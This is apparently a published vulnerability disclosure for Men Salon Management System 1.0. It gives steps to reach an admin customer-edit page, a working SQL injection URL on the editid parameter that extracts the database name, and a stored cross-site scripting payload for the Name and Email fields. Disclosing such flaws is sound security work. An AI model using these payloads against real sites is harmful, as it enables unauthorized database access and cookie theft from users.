# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities
# Date: 2021-09-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server
# Vulnerable page :
http://localhost/msms/admin/edit-customer-detailed.php?editid=
# Proof Of Concept :
# 1 . Download And install [ Men Salon Management System ]
# 2 . Go to /msms/admin/index.php and Enter Username & Password
# 3 . Navigate to >> Customer List
# 4 . In the action column, click Edit
# 5 . Enter the payload into the Url and Fields
# [ Sql Injection ] :
Vulnerable paramater :
The editid paramater is Vulnerable to sqli
GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+
# [ Stored Cross-Site Scripting ] :
Vulnerable Fields : Name & Email
Payload Used: "><script>alert(document.cookie)</script>